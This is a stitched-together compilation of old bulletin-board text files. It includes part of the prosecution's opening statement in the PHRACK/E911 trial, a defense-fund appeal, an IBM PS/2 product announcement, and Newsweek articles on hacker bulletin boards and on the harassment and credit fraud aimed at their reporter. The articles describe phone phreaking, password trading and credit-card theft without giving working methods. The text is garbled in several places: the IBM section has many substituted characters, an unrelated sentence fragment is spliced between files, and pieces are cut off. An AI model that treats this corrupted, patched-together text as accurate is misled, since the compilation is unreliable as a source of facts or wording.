maintenance and the operation of 911 are kept, and it has pulled up
all kinds of information about the person making the call.

          When the person picks up the phone, it's connected wit police,
fire and ambulance. They have a TV monitor in front of them or a
computer monitory, if you will, which has all kinds of information.
It has the name of the caller or the people that the are known to be at the
calling address. It will have location information with respect to
where the closest department is, fire department, police department,

- 21 -

Cook -- opening statement

to that person. It will also contain information in their computer
storage banks about special problems that may exist. If it's a
business, if it's a business involving chemicals, the fact that those
chemicals are explosive will be reflected on that screen. If it is a
private home, if there is a handicapped person there, it will be
reflected on that screen. And it's all done within a matter of three
to five seconds. They have it captured there. That is what
Enhanced 911 is about. That's the system that Robert Riggs stole:
how that all works together, and how the computers at BellSouth
support that kind of capability, consistent with the telephone
company's long history, going back to that first phone call,
"watson, I want you", their tradition of providing emergency services
as the first priority of the phone system.

     You will be hearing from essentially three groups of
witnesses. You will be hearing from people at bellSouth that will
tell you about the steps taken to protect the system. They will tell
you about the way the file was defined. They will also tell you that
at the same time that they were having these problems with 911 in
terms of the los of the file, at the same window, they recognized
that there was a larger problem throughout the network as a result
of hacker intrusions, that there were a series of bellSouth
computers along the network that had been attacked or were under
attack. Some of those computers included the ESS switches. They
recognized that the Enhanced 911 theft was a symptom of a disease.
The disease was the hackers into switches, and they took remedial

- 22 -

Cook -- opening statement

steps. They started out slowly to try to identify it, and then they
rapidly expanded, trying to solve the disease along with the problem
of E911. So you will hear from the BellSouth people.

          You are also going to be hearing from three members of the
Legion of Doom, three hackers. You're going to be hearing from
Robert Riggs, Frank Darden and Adam Grant. They have hacker
handles. These hacker handles sometimes seem to get to be a little
on the colorful side, a little bit like "CB" handles.

          You are going to be hearing the testimony of the hackers.
You're going to be hearing the testimony of Robert Riggs who will
testify that Mr. Neidorf had been after him to give him information
to put into PHRACK, this hacker newsletter. That when Riggs had
broken into the AIMS-X computer in BellSouth, he saw on that AIMX-X
computer at BellSouth the 911 text file. You're going to hear that
he contacted Neidorf in advance, that in that advance conversation or
communication, he advised Neidorf that he had the text file, he was
sending him the text file to put in PHRACK, that he had gotten it
>from an unauthorized account that he had on the BellSouth computer.
Essentially, what he told Neidorf is, "This is a stolen piece of
material you're getting".

          He indicated to Neidorf and Neidorf agreed...first, he
agreed to take the stolen property, and he agreed to disguise the
identity of the stolen property to some degree so that it wouldn't
run off on Riggs. Riggs' name wouldn't appear on the file when it was
published in PHRACK. He would try to disguise some of the

- 23 -

Cook -- opening testimony

indiations that it was stolen from the BellSouth area...Neidorf
would. You will hear evidence that that is exactly what Neidorf did
to some degree or another.

          You will hear evidence bout Neidorf seeing and noting the
proprietary warnings that made it clear that this was stolen
property belonging to BellSouth. He even made a joke of it. He put a
little, "Whoops"next to it when he sent it back to Riggs because he
didn't want BellSouth to know that he was inside their computers.

          You're also going to hear evidence that Riggs was never
satisfied with the final result that Neidorf had because it always
contained too much information even for Riggs. But the E911 system,
the text file and the road map, was published by Neidorf all the
same.

          You are going to be hearing from Agent Foley who will
testify that he talked to Neidorf about this at his fraternity house
at the University of Missouri. Neidorf said he has freedom of
expression. That was his response to Foley: Freedom of expression
to publish it in PHRACK.

     The First Amendment can't be used as a defense to theft.
When you steal something, you can't claim that coming up the back
door, the First Amendment protected you.

     You will be hearing from Agent Foley though that as part
of this discussion with Mr. Neidorf, Mr. Neidorf, in fact, admitted
that he knew the file was stolen, the text file was stolen, and he
published it in PHRACK.

- 24 -

Cook -- opening statement

          He also turns over to Foley a hacker tutorial, a hacker
lesson to other hackers on how to break into the ESS switches. He
turns that over.

          The evidence will also indicate that in addition to that
stolen information was information about a stolen AT&T source code
document. Here he goes again...source code! The source code program
had a Trojan horse in it. It made it clear right on the face
of it that it was a Trojan horse, a way of stealing passwords from a
computer.

          I am going to have to pause here for a second to make
sure that I reassure you again on the descriptions and the items
we'll talk about.

          The source code is a type of language. It is kind of a way
human beings write things down as a first step toward communicating
with computers. They write it down in source code, which is
directions. A rough analogy would be if I'm going to give you
directions on how to get to my house. The source code for that kind
of program might be something like:

"Go to the door.
          "Open the door.
          "Go through the door.
          "Go forward to the sidewalk.
          "Go the the sidewalk and stop.
          "Stop at the sidewalk. Turn left.
          "After you turn left, start walking.

- 25 -

Cook -- opening statement

Step by step by step progression along the way. That is kind of what
the source code is about. You will hear, fortunately, a much better
description of this from the witnesses on the stand.

          The source code program that was stolen here that
Mr. Neidorf received, again, basically was clear from the face of the
document that it was stolen. And, again, Mr. Neidorf transferred it
out to somebody else. Again, stolen property was received and
distributed in interstate commerce.

          The nature of this source code was that it would act a lot
like a false front door to a computer, where you walk up to the
false front door of the computer, you knock on the door, and somebody
inside the door or inside the house says, "Who is it?" The person
knocking on the door uses their secret word, or their name or an
identifier, or it's recognized by the person inside the house:
          "My name is Joe Jones."
          "My name is Bill Cook."
          "My name is Colleen Coughlin."
          "My name is Tim Foley."
Except with this door, it was a false door, and what it had the
capability to do is it would record the information. It would
record, "Bill Cook," "Joe Jones," "Colleen Coughlin," "Tim Foley".
Those are the passwords to get into the house that a legitimate user
of the house would use.

          But this Trojan horse, what it would do is it would store
those, and after it had stored all that information, it would

- 26 -

Cook -- opening statement

essentially disappear. And the person trying to get in the house would
all of a sudden get a communication from the other side that would
say, "I didn't hear you. Try it again".

          It would steal those passwords, and it would then put them
in a private place where the hacker would come back whenever he
wanted to, and just pick up the bucketful of passwords and log-ons,
and use them to break into the same computer systems again and
again, kind of an elaborate piced of scientific perversion but that
is what it is about. That was the document that Mr. Neidorf also
trafficked in as part of this fraud scheme.

          The final expert that you will probably hear from on the
government's side is going to be a man from inside the phone
company, a man who was with bell laboratories before he was with the
phone company. His name is Mr. Williamson. Mr. Williamson will talk
to you about the property, the property being the text file, and
the way in which and the reason that the phone company protects
this kind of property, this information.

          He will testify, we anticipate, to the obligations of the
phone company, to the significance of the text file, along with
other people, and the fact that the theft was the theft of critical
information for the operation of that system, and that the
proprietary markings made it clear to anyone who took it that that
was stolen and that they didn't have authorization for that document.

          No matter what other information floating around about 911
that might be out there, this document was proprietary and contained
the inside information about what this system was all about, and how
an emergency call is driven from the point of someone picking up
the receiver to the time when the help is actually generated from
the fire, police and ambulance stations.

          As I've said before, it's that text file that Mr. Neidorf
deliberately compromised into the hacker community. At the
conclusion of this case, we are going to be coming back here and
asing you to find a guilty verdict against Mr. Neidorf for the
interstate transportation of that stolen text file both from the time
he got it from Riggs, and it was sent from Rigs in Georgia to the
bulletin-board in Lockport down to Neidorf at the University of
Missouri, that's one interstate transportation of stolen property,
and the interstate transportation of stolen property, that same
stolen information back from Neidorf to Riggs in Lockport. In this
situation, it was reviewing the stolen property to make sure that
they could disguise themselves. And then the final interstate
transportation of that stolen property when Mr. Neidorf compromised
the text file into the hacker community.

          I appreciate your attention. That concludees my remarks.
I ask you to pay as much attention to Mr. Zenner as he makes his
remarks to you this morning.

          Thank you.

     THE COURT: Thank you, Mr. Cook. Mr. Zenner, are you prepared
to make your opening statement?

                  <End of Cook -- Opening Comments>



                      CRAIG NEIDORF DEFENSE FUND

  Most of you know about the PHRACK trial and Craig Neidorf, the
  publisher of PHRACK. Craig put his neck on the line to provide
  timely, interesting, and helpful information to the phreak/hacker
  community. The government decided to put a stop to that flow of
  information so last summer they arrested Craig for publishing a
  PHRACK article on Bell South's Emergency 911 system, an article
  which contained a document which was illegally downloaded from Bell
  South's computer system.

  The government's case fell apart after it was revealed that the
  document, originally valued at $79,449 by Bell South, was
  obtainable by dialing an 800 number and paying $13. This, and the
  fact that Neidorf was not the one who accessed Bell South's
  computer, caused the government to drop the charges and set Craig
  Neidorf free.

  Good news, right? Well it is and it isn't. While the government
  lost its case, Craig Neidorf will no longer be publishing PHRACK,
  so the government still wins. The fact is that although Craig won
  in court, he must still pay his own attorney's fees. His original
  bill reached over $200,000! The law firm that he had retained found
  ways to reduce $100,000 off of that amount, but Craig and his
  family have still paid $35,000 to one firm, $8,000 to another, and
  have roughly $65,000 left to pay off. THIS IS AFTER "WINNING" IN
  COURT!

  No, he cannot sue the government for this money. He has to pay it
  himself. A lot of people seem to think that the Electronic Frontier
  Foundation (EFF) is going to help him with his legal bills. No way.
  The EFF does not want to be perceived as a "hacker defense fund" so
  they are trying to distance themselves from the case. Their only
  help in the matter was to pay for court motions filed by the EFF's
  law firm on Neidorf's behalf concerning the First Ammendment. THE
  EFF HAS NO PLANS AT THIS TIME TO HELP PAY NEIDORF'S ATTORNEY FEES.

  What this means is that Craig Neidorf, after being harrassed and
  arrested by the government for PUBLISHING A MAGAZINE, will shut his
  magazine down and pay approximately $100,000 in attorney fees EVEN
  THOUGH HE WON HIS COURT BATTLE.

  If you're as outraged by this as I am, I want you to know that you
  can do something about it. You can show Neidorf how much you valued
  PHRACK and how outraged you are about what happened to him by
  sending money to the Neidorf Defense Fund. Every cent that you send
  will be used to defray his attorney fees. The address is:

                      NEIDORF DEFENSE FUND
                      Attn: Sheldon Zenner
                      Katten, Muchin & Zavis
                      525 West Monroe Street #1600
                      Chicago, Illinois  60606-3693

  Checks *MUST* be payable to "Katten, Muchin & Zavis" and have 
  "Neidorf Defense Fund" written in the memo field.

  You can help even more by downloading this message and uploading it
  to as many other BBSes as you possibly can. It's available on
  &TOTSE, 415/935-5845, as NEIDORFD.ZIP. Also, if you're a caller on
  &TOTSE and you send Neidorf a check for $25 or more, send me a
  photocopy of the cancelled check and I'll give you 250 file
  transfer credits. &TOTSE's mailing address is: Jeff Hunter, & the
  Temple of the Screaming Electron, P.O. Box 5378, Walnut Creek, CA,
  94596.

IBM ANNOUNCEMENT OVERVIEW 04-02-(7                                         
                                                                           
IBM Announcement Overview                                                  
                                                                           
Today, IBM announces IBM Personal System/2(TM), a family of                
systems with enhanced displays and adapters, expanded                      
communications and network adapters, expanded memory                       
adapters, new features and input output devices; an enhanced               
version of the IBM Disk Operating System, and new software                 
support for host terminal emulation, networking and                        
communications.  New applications are also being announced.                
                                                                           
IBM is also announcing Operating System/2, a new                           
comprehensive operating system which includes a Presentation               
Manager, a Communications Manager, and a Database Manager.                 
Operating System/2 is backed by a three month warranty, and                
one year of service support fbom date of product                           
availability.  DisplayWrite 4 /2 for Operating System/2 is                 
also being announced.                                                      
                                                                           
(TM)  Trademark of the International Business Machines                     
Corporation.                                                               
                                                                           
HIGHLIGHTS                                                                 
                                                                           
The products and associated support elements of this                       
announcement, address the following key objectives:                        
                                                                           
o  Provide a range of systems to meet user's needs                         
                                                                           
o  Introduce improved levels of price, performance,                        
   capacity, function, and reliability                                     
                                                                           
o  Introduce new hardware architectures which enable future                
   growth without some of the restrictions and limitations                 
   in the existing product line                                            
                                                                           
o  Offer enhanced warranty and service for hardware and                    
   software                                                                
                                                                           
o  Introduce improved graphics functions integrated into the               
   new systems                                                             
                                                                           
o  Integrate serial, parallel and diskette  adapters into                  
   the new systems                                                         
                                                                           
o  Provide a compatibility bridge from existing hardware and               
   software to minimize the impact on end user's investment                
                                                                           
o  Coexist and interconnect with existing IBM Personal                     
   Computers                                                               
                                                                           
o  Introduce the 3.5-inch diskette as the primary media for                
   IBM Personal System/2 systems                                           
                                                                           
o  Provide a comprehensive operating system for the new                    
   hardware with support for larger memory, concurrent                     
   processing of applications, high level pbogramming                      
   interfaces, communications and data base management                     
   features                                                                
                                                                           
o  Move toward consistency with other systems in the IBM                   
   product line by participating in the IBM Systems                        
   Application Architecture with our new offerings                         
                                                                           
It is our intention that this announcement will establish                  
new levels of end user satisfaction in the areas of quality,               
service, compatibility, graphics, hardware architecture,                   
software function and programming interfaces, ease of use,                 
and consistency across a range of product lines.                           
                                                                           
The Personal System/2 systems units being announced replace                
many of the ehisting IBM Personal Computer systems, and are                
intended to establish a new level of function, performance,                
capacity, and reliability.                                                 
                                                                           
DESCRIPTION                                                                
                                                                           
There are two groups of Personal Cystem/2 systems units.                   
Personal System/2 Model 30, is intended to satisfy the                     
requirements of personal productivity users.  This model is                
based on the 8086 microprocessor, and can use many of the                  
same feature cards as the existing product line.  This model               
introduces as standard function the Multi-Color Graphics                   
Array (MCGA) graphics, a new level of graphics which is an                 
enhancement to the Color Graphics Adapter function.  The                   
Model 30 is available as a dual 3.5-inch diskette, or                      
diskette and fixed disk system.  Compared to the IBM PC                    
XT(TM) 089, the Model 30 provides:                                         
                                                                           
o  Twice the diskette capacity                                             
o  Improved hard file access time                                          
o  Improved integrated graphics                                            
o  A clock with calendar                                                   
o  Integrated adapters for printers, serial devices, and                   
   pointing devices                                                        
o  Improved throughput                                                     
                                                                           
(TM)  Trademark of the International Business Machines                     
//@AGE                                                                     
Corporation.                                                               
                                                                           
If an end user is primarily a "Personal Productivity" user                 
in small business, large business or in education, then the                
Personal System/2 Model 30 is the right choice.                            
                                                                           
The operating system software for the Personal System/2                    
Model 30 is the IBM Disk Operating System Version 3.30.                    
Operating System/2 will not run on Model 30.                               
                                                                           
Personal System/2 Models 50, 60, and 80 are intended to                    
satisfy the requirements of systems users who need higher                  
personal productivity performance, or who require larger,                  
more complex applications and operation in a multiple                      
application and/or communications environment.                             
                                                                           
These models are based on the 80286 and 80386                              
microprocessors.  They introduce a new Micro Channel(TM)                   
Architecture for feature and input/output data handling.                   
The new architecture is a significant improvement over                     
previous existing designs due to its improved interru`t                    
handling capabilities which permit resolution of most                      
conflicts present in existing systems, while balancing and                 
improving the performance of the system.                                   
                                                                           
(TM) Tbademark of the International Business Machines                      
Corporation                                                                
                                                                           
These models also introduce Video Graphics Array (VGA)                     
graphics, a higher level of graphics function, which is an                 
enrichment of the Enhanced Graphics Adapter function.  VGA                 
graphics is upward compatible from Mono Graphics, CGA, MCGA,               
and EGA and can run on the Personal System/2 Model 30 with                 
the appropriate feature card.                                              
                                                                           
Compared with the IBM Personal Computer AT(R) 339, the                     
Personal System/2 Models 50 and 60 provide:                                
                                                                           
o  Increased standard memory                                               
o  20% more diskette capacity                                              
o  Improved integrated graphics                                            
o  Integrated pointing device adapter                                      
o  Improved system throughput                                              
o  Advanced Micro Channel(TM) Architecture                                 
                                                                           
(R)  Registered trademark of the International Business                    
Machines Corporation.                                                      
                                                                           
(TM)  Trademark of the Internadional Business Machines                     
Corporation.                                                               
                                                                           
The Model 50 has a 20MB fixed disk.  The Model 60 offers 44                
to 185MB fixed disk capacity.                                              
                                                                           
The Personal System/2 Model 80 is based on the 80386                       
microprocessor.  Three models are available:                               
                                                                           
                                    Standard    Fixed                      
                     Processor      Fixed       Disk                       
                     Speed          Disk        Capacity                   
                                                                           
Model 041            16MHZ           44MB        88MB                      
Model 071            16MHZ           70MB       185MB                      
Model 111            20MHZ          115MB       230MB                      
                                                                           
If an end user currently requires or plans to migrate into a               
multi-tasking, multi-communications environment, or has                    
applications requiring exceptionally high performance                      
levels, then the Personal System/2 Models 50, 60 and 80,                   
with new architecture and higher performance application                   
capability, are the solution.                                              
                                                                           
The operating system for Models 50, 60 and 80 is the IBM                   
Disk Operating System Version 3.3.  When available Operating               
System/2 will become the operating system of choice for many               
users of these systems.                                                    
                                                                           
Operating System/2 is the growth path for the IBM Disk                     
Operating System. It will run many existing DOS applications               
unchanged. It takes advantage of the new hardware                          
capabilities, provides significant new function, offers                    
enhanced ease of use, and provides a platfobm for future                   
application growth.                                                        
                                                                           
The Operating System/2:                                                    
                                                                           
o  Presents a consistent user interface with context                       
   sensitive help                                                          
o  Supports up to 16MB of main storage with virtual memory                 
   support                                                                 
o  Allows concurrent execution of multiple applications                    
o  Allows communication between applications                               
o  Supports multiple concurrent communications sessions.                   
                                                                           
Operating System/2 (Standard Edition) also provides a                      
comprehensive set of high level functions which have not                   
been needed in the past.  It includes the base functions                   
described above, plus:                                                     
                                                                           
o  Presentation Manager which su`ports a consistent, easy to               
   use interface dhat is designed to participate in the IBM                
   Systems Application Architecture                                        
                                                                           
Operating System/2 (Extended Edition) includes all of the                  
function of the Standard Edition, plus:                                    
                                                                           
o  Communications Manager providing a wide range of                        
   concurrent connectivities and protocols, concurrent                     
   emulation of multiple terminal types, file transfer under               
   terminal emulation, and communications and systems                      
   management support                                                      
                                                                           
o  Database Manager which is a Relational Data Base                        
   Management System.  It is consistent with IBM's host                    
   based Structured Query Language and Query Management                    
   Facility                                                                
                                                                           
Whatever the end-user environment or requirements may be,                  
IBM is establishing new levels of capability and value.  The               
entire Personal System/2 family achieves higher levels of:                 
                                                                           
o  Quality and Beliability                                                 
o  Ease of Use                                                             
o  Graphics                                                                
o  Connectivity                                                            
o  Compatibility and Consistency                                           
                                                                           
These systems, along with IBM's options, including new                     
monochrome and color monitors, expanded memory adapters,                   
personal printers, an optical disk drive, tape backup,                     
connectivity cards, and many more, are designed to meet                    
computing needs, now and for many years to come.                           
ans to migrate into a               
multi-tasking, mul  ********************************  *                              *  * RADIO SCHLOCK HELPS THE FEDS *  *                              *  ********************************                                   written by:                         W.R. Greer                                  brought to                          you by:                         /P /A /P   a prime anarchist production. NEW YORK--Joel C. Guskin, a telephone products buyer for the Tandy Corp. in Fort Worth, asked to go off the record. Asked what could be sensitive about a new attachment for the telephone, Guskin whispered, "It involves the government."     Although he will not tell the whole story, Guskin said government agencies have been buying Tandy's new Duofone CPA-1000, a computerized phone accountant, and using it in surveillance.     Doesnt the government have more sophistocated equipment for keeping track of someone's telephone calls? Of course, Mr. Guskin said, but if the object of scrutiny finds and destroys the call recorder, it is less expensive to replace the CPA-1000, which costs $99.95, than the $500 to $5000 models such agencies usually use.     The CPA-1000, which is as big as an adding machine, keeps track of local and long distance calls made and received. It uses a computer chip and prints on a tape the time and date of the call, the number of the call, and the call's duration.     It cannot provide the telephone number of your callers. For incoming calls, the CPA-1000 records the number of rings before pickup, the time and date of the call and the duration. At the end of the day, it prints out the number of incoming calls and the number of outgoing local and long distance calls.     Long distance telephone companies have acknowleged billing some customers twice for the same call or for calls not answered. The CPA-1000 could help protect against such erroneouscharges and could also help keep track of monthly phone bills.whaddyathinkofthat? p r  i   m    e

                          The Night of the Hackers
                          ________________________


  .  As you are surveying the dark and misty swamp you come across what
     appears to be a small cave.  You light  a  torch  and  enter.  You
     have  walked  several  hundred feet when you stumble into a bright
     blue portal.  .  .  With a  sudden  burst  of  light  and  a  loud
     explosion you are swept into . . . DRAGONFIRE . . .  Press Any Key
     if You Dare."

  .  You have programmed your personal computer to dial into
     Dragonfire, a computer bulletin board in Gainesville,  Texas.  But
     before you get any information, Dragonfire demands your name, home
     city  and phone number.  So,  for tonight's tour of the electronic
     wilderness you become Montana Wildhack of San Francisco.

  .  Dragonfire, Sherwood Forest (sic), Forbidden Zone,
     Blottoland,  Plovernet,  The Vault, Shadowland, PHBI and scores of
     other computer bulletin boards are hangouts of a new generation of
     vandals. These precocious teenagers use their electronic skills to
     play hide-and-seek with computer and  telephone  security  forces.
     Many  computer  bulletin  boards  are  perfectly legitimate:  they
     resemble electronic  versions  of  the  familiar  cork  boards  in
     supermarkets and school corridors,  listing services and providing
     information someone out there is bound to find  useful.  But  this
     is  a walk on the wild side,  a trip into the world of underground
     bulletin  boards  dedicated  to  encouraging  --  and  making   --
     mischief.

  .  The phone number for these boards are as closely guarded as a
     psychiatrist's home telephone number.  Some numbers are posted on
     underground  boards;  others  are exchanged over the telephone.  A
     friendly hacker provided Dragonfire's number.  Hook up and you see
     a broad choice of topics offered. For Phone Phreaks -- who delight
     in  stealing  service  from  AT&T  and  other  phone  networks   .
     Phreakenstein's Lair is a potpourri of phone numbers, access codes
     and  technical information.  For computer hackers -- who dial into
     other people's computers -- Ranger's Lodge is chock-full of  phone
     numbers  and  passwords  for government,  university and corporate
     computers.  Moving through Dragonfire's offerings,  you  can  only
     marvel  at  how conversant these teen-agers are with the technical
     esoterica of today's electronic age.  Obviously they have spent  a
     great  deal  of time studying computers,  though their grammar and
     spelling indicate they haven't been diligent  in  other  subjects.
     You are constantly reminded of how young they are.

  .  "Well it's that time of year again. School is back in session
     so  let's get those high school computer phone numbers rolling in.
     Time to get straight A's,  have perfect  attendance  (except  when
     you've been up all night hacking school passwords), and messing up
     you worst teacher's paycheck."

  .  Forbidden Zone, in Detroit, is offering ammunition for hacker
     civil war -- tips on  crashing  the  most  popular  bulletin-board
     software.  There  also are plans for building black,  red and blue
     boxes to mimic operator tones and get free phone service.  And  he
     re  are  the  details for "the safest and best way to make and use
     nitroglycerine," compliments of Doctor Hex, who says he got it
     "from my chemistry teacher."

  .  Flip through the "pages." You have to wonder if this
     information  is accurate.  Can this really be the phone number and
     password for Taco Bell's computer?  Do these kids really have  the
     dial-up numbers for dozens of university computers? The temptation
     is  too much.  You sign off and have your computer dial the number
     for the Yale computer.  Bingo -- the words Yale University  appear
     on your screen.  You enter the password.  A menu appears. You hang
     up in a sweat. You are now a hacker.

  .  Punch in another number and your modem zips off the touch
     tones. Here comes the tedious side of all of this. Bulletin boards
     are popular. No vacancy in Bates Motel (named for Anthony Perkin's
     creepy motel in the movie "Psycho"); the line is busy.  So are 221
     B.  Baker Street, PHBI, Shadowland and The Vault,  Caesar's Palace
     rings  and  connects.  This is different breed of board.  Caesar's
     Palace is a combination Phreak board and computer store in  Miami.
     This  is  the  place to learn ways to mess up a department store's
     anti-shoplifting system,  or make free calls  on  telephones  with
     locks  on  the  dial.  Pure  capitalism  accompanies such anarchy,
     Caesar's Palace is offering good deals on disc  drives,  software,
     computers  and  all  sorts of hardware.  Orders are placed through
     electronic mail messages.

  .  'Tele-Trial': Bored by Caesar's Palace, you enter the number
     for Blottoland,  the board operated by one of  the  nation's  most
     notorious computer phreaks -- King Blotto.  This one has been busy
     all night, but it's now pretty late in Cleveland.  The phone rings
     and you connect.  To get past the blank screen, type the secondary
     password "S-L-I-M-E." King Blotto obliges,  listing his rules:  he
     must have your real name,  phone number,  address,  occupation and
     interests. He will call and disclose the primary password, "if you
     belong on this board." If admitted, do not reveal the phone number
     or  the  secondary password,  lest you face "tele-trial," the King
     warns as he dismisses  you  by  hanging  up.  You  expected  heavy
     security,  but this teenager's security is,  as they say, awesome.
     Computers at the Defense Department and hundreds of businesses let
     you know when you've reached them.  Here you need a password  just
     to find out what system answered the phone.  Then King Blotto asks
     questions -- and hangs up.  Professional computer-security experts
     could learn something from this kid.  He knows that ever since the
     414 computer hackers were arrested in August 1982, law-enforcement
     officers  have  been  searching  for  leads  on  computer bulletin
     boards.

  .  "Do you have any ties to or connections with any law
     enforcement  agency  or  any  agency which would inform such a law
     enforcement agency of this bulletin board?"

  .  Such is the welcoming message from Plovernet, a Florida board
     known  for  its great hacker/phreak files.  There amid a string of
     valid VISA and MasterCard numbers are  dozens  of  computer  phone
     numbers  and  passwords.  Here you also learn what Blotto means by
     tele-trial.  "As some of you may or may not know, a session of the
     conference  court was held and the Wizard was found guilty of some
     miscellaneous  charges,  and  sentenced  to  four  months  without
     bulletin  boards."  If  Wizard  calls,  system operators like King
     Blotto disconnect him. Paging through bulletin boards is a test of
     your patience. Each board has different commands.  Few are easy to
     follow,  leaving you to hunt and peck your way around.  So far you
     haven't had the nerve  to  type  "C,"  which  summons  the  system
     operator for a live, computer-to-computer conversation.  The time,
     however,  however  has  come for you to ask a few questions of the
     "sysop." You dial a computer in Boston.  It answers and you  begin
     working your way throughout the menus. You scan a handful of dial-
     up  numbers,  including one for Arpanet,  the Defense Department's
     research computer.  Bravely tap C and in seconds the screen blanks
     and your cursor dances across the screen.

  .  Hello . . . What kind of computer do you have?

  .  Contact. The sysop is here. You exchange amenities and get
     "talking." How much hacking does he do?  Not much, too busy. Is he
     afraid of being busted,  having his computer confiscated like  the
     Los  Angeles  man  facing  criminal  changes  because his computer
     bulletin board contained a  stolen  telephone-credit-card  number?
     "Hmmmm  .  .  .  No,"  he  replies.  Finally,  he asks the dreaded
     question:  "How old are  you?"  "How  old  are  YOU,"  you  reply,
     stalling.  "15,"  he  types.  Once you confess and he knows you're
     old enough to be his father,  the conversation gets very  serious.
     You fear each new question;  he probably thinks you're a cop.  But
     all he wants to know  is  your  choice  for  president.  The  chat
     continues,  until  he  asks,  "What  time  is it there?" Just past
     midnight, you reply. Expletive. "it's 3:08 here," Sysop types.  "I
     must be going to sleep.  I've got  school  tomorrow."  The  cursor
     dances "*********** Thank you for Calling." The screen goes blank.

                                 Epilog:

  .  A few weeks after this reporter submitted this article to
     Newsweek,  he found that his credit had been altered, his drivers'
     licence revoked,  and EVEN HIS Social  Security  records  changed!
     Just in case you all might like to construe this as a 'Victimless'
     crime.  The  next  time  a  computer fouls up your billing on some
     matter, and COSTS YOU, think about it!
                     _______________________________

  .  This the follow-up to the previous article concerning the
     Newsweek reporter.  It spells out SOME of the REAL dangers to  ALL
                   of us, due to this type of activity!

                     _______________________________
                        The REVENGE of the Hackers
                     _______________________________

  .  In the mischievous fraternity of computer hackers, few things
     are  prized  more  than  the  veil  of  secrecy.  As  NEWSWEEK San
     Francisco correspondent Richard Sandza found out after  writing  a
     story on the electronic underground's (DISPATCHES,  Nov.  12, 198\
     ability  to  exact  revenge  can  be  unnerving.  Also  severe....
     Sandza's report:

  .  "Conference!" someone yelled as I put the phone to my ear.
     Then came a mind-piercing "beep," and suddenly my  kitchen  seemed
     full  of  hyperactive  15-year-olds.  "You  the  guy who wrote the
     article in NEWSWEEK?" someone shouted from the depths  of  static,
     and  giggles.  "We're  going disconnect your phone," one shrieked.
     "We're going to blow up your house," called another. I hung up.

  .  Some irate readers write letters to the editor. A few call
     their  lawyers.   Hackers,  however,  use  the  computer  and  the
     telephone, and for more than simple comment. Within days, computer
     "bulletin  boards"  around the country were lit up with attacks on
     NEWSWEEK's "Montana Wildhack" (a name I took from a Kurt  Vonnegut
     character),  questioning  everything  from  my manhood to my prose
     style.  "Until we get real good revenge," said  one  message  from
     Unknown  Warrior,  "I  would like to suggest that everyone with an
     auto-l modem call Montana Butthack then hang up when he  answers."
     Since  then  the  hackers  of America have called my home at least
     2000 times.  My harshest  critics  communicate  on  Dragonfire,  a
     Gainesville,  Texas,  bulletin  board  where I am on teletrial,  a
     video-lynching in which a computer user with grievance  dials  the
     board  and  presses  charges  against  the offending party.  Other
     hackers  --  including  the  defendant  --post   concurrences   or
     rebuttals.  Despite  the  mealtime interruptions,  all this was at
     most a minor nuisance; some was amusing, even fun.

  .  FRAUD: The fun stopped with a call from a man who identified
     himself only as Joe.  "I'm calling to warn you," he said.  When  I
     barked back, he said, "Wait, I'm on your side.  Someone has broken
     into TRW and obtained a list of all your credit-card numbers, your
     home address,  social-security  number  and  wife's  name  and  is
     posting  it  on  bulletin boards around the country." He named the
     charge cards in my wallet.

  .  Credit-card numbers are a very hot commodity among some
     hackers.  To get one from a computer system and  post  it  is  the
     hacker  equivalent  of  making the team.  After hearing from Joe I
     visited the local office of the TRW credit bureau and got  a  copy
     of my credit record.  Sure enough, it showed a Nov.  13 inquiry by
     the Lenox (Mass.) Savings Bank,  an  institution  with  no  reason
     whatever  to  ask  about me.  Clearly some hacker had used Lenox's
     password to the TRW computers to get to my  files  (the  bank  has
     since changed the password).

  .  It wasn't long before I found out what was being done with my
     credit-card numbers,  thanks to another friendly hacker who tipped
     me to Pirate 80,  a bulletin board in Charleston,  W.Va.,  where I
     found  this:  "I'm  sure you guys have heard about Richard Stza or
     Montana Wildhack.  He's the guy who wrote the obscene story  about
     phreaking  in NewsWeek Well,  my friend did a credit card check on
     TRW . . . try this number, it' a VISA . .  .  Please nail this guy
     bad . . . Captain Quieg.

  .  Captain Quieg may himself be nailed. He has violated the
     Credit  Card  Fraud Act of 1984 signed by President Reagan on Oct.
     12.  The law provides a $10,000 fine and up to  a  15-year  prison
     term  for  "trafficking" in illegally obtained credit-card account
     numbers.  His "friend" has committed  a  felony  violation  of  the
     California  computer-crime  law.  TRW  spokeswoman Delia Fernandex
     said that TRW would "be more than  happy  to  prosecute"  both  of
     them.

  .  TRW has good reason for concern. Its computers contain the
     credit  histories  of  120  million people.  Last year TRW sold 50
     million credit  reports  on  their  customers.  But  these  highly
     confidential   personal   records   are  so  poorly  guarded  that
     computerized  teenagers  can  ransack   the   files   and   depart
     undetected. TRW passwords -- unlike many others -- often print out
     when  entered by TRW's customers.  Hackers then look for discarded
     printouts.  A good source:  the  trash  of  banks  and  automobile
     dealerships,  which  routinely do credit checks.  "Everybody hacks
     TRW," says Cleveland hacker King Blotto,  whose bulletin board has
     security  system the Pentagon would envy.  "It's the easiest." For
     her her part,  Fernandez insists that TRW "does everything it  can
     to keep the system secure.

  .  In my case, however, that was not enough. My credit limits
     would hardly support big-time fraud,  but victimization takes many
     forms. Another hacker said it was likely that merchandise would be
     ordered in my name and shipped to me -- just to harass me.  I used
     to  use  credit-card  numbers  against someone I didn't like," the
     hacker said.  "I'd call Sears and have a dozen toilets shipped  to
     his house."

  .  Meanwhile, back on Dragonfire, my teletrial was going strong.
     The charges,  as pressed my Unknown Warrior,  include "endangering
     all phreaks and hacks." The judge in this case is  a  hacker  with
     the  apt name of Ax Murderer.  Possible sentences range from exile
     from the entire planet" to "kill the dude." King Blotto has  taken
     up my defense,  using hacker power to make his first pleading:  he
     dialed  up  Dragonfire,   broke  into  its  operating  system  and
     "crashed"  the  bulletin  board,  destroying  all  of its messages
     naming me. The board is back up now, with a retrial in full swing.
     But then,  exile from the electronic underground looks better  all
     the time.

NightHack : A Story about Hackers
 
The word HACKER has taken on a new meaning recently. It used tomean an avid 
computer user. But now it has taken to the likes (baically) of someone who uses  
his computer to steal, alter, or misuse online data that is not theirs. Below is 
a story obtained from a BBS and no author's name was given. But it is my 
inference from reading the story that it was written by Montana Wildhack, the 
Newsweek reporter who gained access to a hacking board, and then found himself 
being harassed by hackers all over the country. (WE ARE NOT *POSITIVE* AS TO WHO 
WROTE THIS. ASSUME IT IS ANONYMOUSLY WRITTEN!). The authors story....
 
The Night of the Hackers
 
 
As you are surveying the dark and misty swamp you come across what appears to be 
a small cave.  You light a torch and enter.  You have walked several hundred 
feet when you stumble into a bright blue portal... With a sudden burst of light  
